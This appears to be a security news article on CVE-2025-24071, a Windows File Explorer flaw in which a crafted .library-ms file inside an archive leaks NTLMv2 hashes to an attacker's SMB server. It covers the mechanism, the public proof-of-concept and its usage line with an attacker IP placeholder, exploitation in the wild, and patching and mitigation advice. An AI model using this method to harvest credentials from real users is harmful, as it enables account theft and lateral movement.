Critical Windows File Explorer Zero-Day Allows Silent NTLM Hash Theft via Archive Extraction

A significant security flaw has been uncovered in Microsoft Windows File Explorer, identified as CVE-2025-24071, which allows malicious actors to surreptitiously obtain NTLM hashed passwords. This critical vulnerability can be exploited through network spoofing by simply tricking a user into extracting a specially crafted compressed file. The ease of exploitation, requiring no further user interaction beyond the standard process of extracting an archive, poses a considerable risk to both individual users and organizations. Security researchers have validated this threat by releasing a proof-of-concept exploit, further underscoring the urgency of addressing this issue. Fortunately, Microsoft has issued a patch for CVE-2025-24071 as part of its March 2025 security updates, urging all affected users to apply the fix immediately 1.

The vulnerability hinges on the way Windows File Explorer handles .library-ms files, which are XML-based files designed to help users organize and search for files by defining search and library locations 1. Windows Explorer inherently trusts these files to accurately specify library locations, a design aspect that malicious actors are now exploiting 3. When a user extracts the contents of a compressed archive, such as a RAR or ZIP file, Windows Explorer automatically attempts to process all the files within, including any .library-ms files, to display them correctly and index their metadata 1. This automatic processing occurs in the background, without requiring the user to explicitly open the .library-ms file itself.

Attackers can craft a malicious .library-ms file containing a <simpleLocation> tag that, instead of pointing to a legitimate local or network library, directs the system to an attacker-controlled Server Message Block (SMB) server 2. SMB is the standard protocol used by Windows for file sharing and network communication. Upon extraction of the archive containing this malicious file, Windows Explorer and the SearchProtocolHost.exe service, which is part of the Windows indexing service, automatically parse the contents of the .library-ms file. This action triggers an NTLM authentication handshake from the victim’s computer to the attacker’s SMB server 1. Notably, this entire process unfolds without any user interaction beyond the initial extraction of the compressed archive. The consequence of this silent handshake is the leakage of the victim’s NTLMv2 hash, a cryptographic representation of their password, to the attacker 1. Once captured, this hash can be used for various malicious purposes. Security researchers have observed that immediately after extraction, the Explorer.exe and SearchProtocolHost.exe processes perform a sequence of operations on the .library-ms file: opening the file (CreateFile), reading its contents (ReadFile), extracting metadata (QueryBasicInformationFile), and closing the file (CloseFile), confirming the automatic nature of the exploitation 2. The vulnerability arises from the implicit trust placed in .library-ms files and the automatic processing of their content by Windows Explorer, allowing attackers to leverage standard Windows functionality for nefarious ends. Furthermore, the involvement of the SearchProtocolHost.exe service suggests that even if a user does not actively browse the extracted files, the indexing service could still initiate the vulnerable authentication process 2.

A proof-of-concept (PoC) exploit for CVE-2025-24071 was developed and publicly released by the security researcher known as “0x6rss” on GitHub on March 16, 2025 1. This public disclosure makes the technical details and a working example of the exploit readily available for scrutiny and, unfortunately, potential misuse. The PoC includes a Python script designed to generate the malicious .library-ms file required to trigger the vulnerability 2. The script is designed to be easily used, requiring minimal input from an attacker, such as the desired name for the target compressed file and the IP address of the attacker’s SMB server 1. For instance, an attacker could use a simple command like python poc.py # Enter file name: your_file_name # Enter IP: attacker_IP to create the necessary malicious file 1. The release of this PoC significantly lowers the barrier for entry, allowing individuals with even limited technical skills to potentially exploit this vulnerability. The script automates the intricate process of crafting the malicious .library-ms file, making it a scalable tool for potential attackers 1.

Disturbingly, there are reports indicating that CVE-2025-24071 was being actively exploited in the wild even before its public disclosure on March 11, 2025 1. This pre-patch exploitation suggests that malicious actors were already aware of and leveraging this vulnerability for their own purposes. The threat actor known as “Krypt0n” has been specifically linked to the exploitation of this flaw 1. Krypt0n is reportedly the developer of a malware strain called “EncryptHub Stealer” and is alleged to have offered the exploit for sale on underground cybercrime forums 1. A translated forum post attributed to this actor details the process: the attacker explains how a server to receive the stolen NTLM hashes can be set up locally, for example, on a Virtual Private Server (VPS). Then, using the exploit, a configuration file is generated with the attacker’s IP address and share details. The attacker claims that if a user simply opens Windows Explorer or accesses a shared folder containing the malicious compressed file, an automatic redirect occurs, and the user’s NTLM hash is sent to the attacker’s server 2. This early exploitation underscores the high value and active use of this vulnerability by malicious actors, emphasizing the critical need for immediate patching.

The theft of NTLMv2 hashes, as enabled by CVE-2025-24071, can have profound and damaging consequences for affected systems and networks 1. One of the primary risks associated with stolen NTLM hashes is the ability to conduct pass-the-hash (PtH) attacks 1. PtH is a technique where attackers use the captured NTLM hash to authenticate to other systems on the network without ever needing the plaintext password 1. This allows attackers to move laterally throughout the network, gaining access to additional resources and potentially compromising critical systems 1. If the compromised user account possesses administrative privileges, a PtH attack can lead to privilege escalation, granting the attacker near-complete control over the affected systems and potentially the entire network 4. Beyond immediate network access, stolen NTLMv2 hashes also present the risk of offline cracking 1. While NTLMv2 is a more robust protocol than its predecessor, given enough time and computational resources, attackers can attempt to crack the hash to reveal the original plaintext password, which can then be used for even broader access. Furthermore, successful NTLM hash theft can be directly leveraged for network spoofing attacks 1. By authenticating as a legitimate user using the stolen hash, attackers can perform actions on the network that appear to originate from that user, potentially facilitating further malicious activities or concealing their own. The underlying issue is that the NTLM authentication protocol, while still widely used, has known weaknesses and lacks modern security features such as multi-factor authentication (MFA) 4, making systems that rely on it more susceptible to these types of attacks. The ease with which NTLM hashes can be obtained through CVE-2025-24071 significantly elevates the risk of these severe consequences.

In response to the discovery and active exploitation of CVE-2025-24071, Microsoft released a security update on March 11, 2025, as part of its regular Patch Tuesday release 1. This update specifically addresses the vulnerability in Windows File Explorer 1. Microsoft is strongly advising all Windows users to apply these security updates immediately to mitigate the risk of exploitation 1. The affected Windows versions include a broad range of both client and server operating systems: Windows 10 (all versions from 1507 to 22H2), Windows 11 (versions 22H2, 23H2, and 24H2), and Windows Server (including versions 2012 R2, 2016, 2019, 2022, and 2025) 1. This particular Patch Tuesday update addressed a total of 57 security flaws across various Microsoft products, including six other vulnerabilities that were reportedly being actively exploited as zero-day attacks 23. While CVE-2025-24071 was also reportedly exploited in the wild 1, it is categorized by some sources as a publicly disclosed zero-day vulnerability 23, highlighting the urgency for users to apply the patch without delay. The effectiveness of Microsoft’s response hinges on the speed and diligence with which organizations and individual users implement these critical updates. Given the public availability of a working exploit and the reports of active exploitation, delaying the application of this patch significantly increases the window of opportunity for malicious actors.

To effectively protect against the threat posed by CVE-2025-24071, users and organizations should adopt a multi-layered approach to security 1. The most immediate and critical step is to apply the Microsoft security update released on March 11, 2025, to all affected Windows systems 1. The update can be found on the Microsoft advisory page: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071 3. Where feasible, organizations should disable NTLM authentication and transition to more secure protocols like Kerberos 2. While NTLM remains for backward compatibility, its inherent security weaknesses make it a persistent target for attackers 4. Implementing network segmentation can also limit the potential damage of a successful attack by isolating critical systems 25. Enabling SMB signing is another recommended measure to help prevent NTLM relay attacks 2. Adhering to the principle of least privilege, ensuring users only have the necessary permissions, can also reduce the impact of compromised credentials 15. It is crucial to conduct user awareness training to educate individuals about the risks of extracting files from untrusted sources, even if they do not intend to open or execute them 10. Organizations should also monitor network traffic for any unusual SMB activity and NTLM authentication attempts 14, and consider implementing file integrity monitoring (FIM) to track changes in sensitive directories 28.

The discovery of CVE-2025-24071 is not an isolated incident; it joins a growing list of recently identified NTLM-related vulnerabilities 2. Similar NTLM-related issues have previously been found in other Microsoft applications, such as Access and Publisher 2. Notably, a zero-day NTLM vulnerability disclosed in December 2024 also involved the simple act of viewing a malicious file in Windows Explorer 4. Additionally, the Windows Themes vulnerability (CVE-2024-21320) demonstrated another avenue through which NTLM credentials could be leaked 4. Even well-known NTLM flaws like PetitPotam and PrinterBug remain unresolved in certain versions of Windows 4. This consistent emergence of NTLM vulnerabilities underscores the inherent security risks associated with this legacy authentication protocol and highlights the pressing need for organizations to prioritize its replacement with more modern and secure alternatives.

In conclusion, CVE-2025-24071 represents a critical vulnerability in Windows File Explorer that allows for the silent theft of NTLM hashes through a simple archive extraction process. Given the active exploitation of this flaw and the availability of a public proof-of-concept, it is imperative that all affected Windows users and organizations apply Microsoft’s March 2025 security patch immediately. Failure to do so could lead to severe consequences, including network compromise and further malicious activities. Implementing the recommended mitigation strategies alongside patching is essential to strengthen overall security posture and reduce the risk of falling victim to this and similar threats.